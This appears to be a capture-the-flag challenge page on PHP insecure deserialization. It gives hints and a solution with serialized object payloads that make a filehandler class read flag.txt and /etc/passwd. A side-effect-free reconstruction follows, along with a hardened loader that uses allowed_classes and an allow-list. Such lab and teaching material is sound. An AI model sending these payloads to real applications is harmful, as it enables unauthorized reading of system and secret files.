PHP

Basic Insecure Deserialization in PHP

Exploit the insecure deserialization vulnerability and extract the flag.txt file located in the current folder.

Hints

Hint #1

If you get a byte error, your payload syntax is invalid!

Hint #2

The PHP magic method __wakeup is executed every time the object is re-created.

Solution

Payload:

O:11:"filehandler":1:{s:4:"file";s:8:"flag.txt";}

Example that opens the /etc/passwd file:

O:11:"filehandler":1:{s:4:"file";s:11:"/etc/passwd";}
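
Why the payload works, and how to close the hole, shown as an added example that is not the challenge's own source code. The body of the filehandler class, the default file name, the allow-list and the function names load_vulnerable and load_hardened are assumptions; the page only shows the class name, its file property and that __wakeup runs on unserialize.

```php
<?php
// Assumed reconstruction of the challenge class (not the challenge's real code).
class filehandler
{
    public $file = 'welcome.txt';   // hypothetical default value

    public function __wakeup()
    {
        // The real class presumably reads $this->file here. This demo only
        // records the path it was handed, so running it has no side effects.
        $GLOBALS['wakeup_calls'][] = $this->file;
    }
}

// Vulnerable pattern: whatever object the client serializes gets instantiated,
// and its __wakeup runs with properties the client chose.
function load_vulnerable(string $input)
{
    return unserialize($input);
}

// Hardened pattern: never instantiate classes from input, accept only a plain
// string, and check that string against a server-side allow-list.
function load_hardened(string $input, array $allowedFiles): ?string
{
    $value = unserialize($input, ['allowed_classes' => false]);
    if (!is_string($value) || !in_array($value, $allowedFiles, true)) {
        return null;
    }
    return $value;
}

// Payload taken from the solution above.
$payload = 'O:11:"filehandler":1:{s:4:"file";s:8:"flag.txt";}';
$allowed = ['welcome.txt'];   // constructed allow-list

$GLOBALS['wakeup_calls'] = [];
load_vulnerable($payload);
var_dump($GLOBALS['wakeup_calls']);   // paths that reached __wakeup

$GLOBALS['wakeup_calls'] = [];
var_dump(load_hardened($payload, $allowed));                   // object payload
var_dump(load_hardened(serialize('welcome.txt'), $allowed));   // plain allowed name
var_dump($GLOBALS['wakeup_calls']);   // paths that reached __wakeup after hardening
```

With allowed_classes set to false, the object arrives as __PHP_Incomplete_Class and no magic method of filehandler is invoked. The PHP manual still advises against passing untrusted input to unserialize() at all and recommends a data-only format such as JSON.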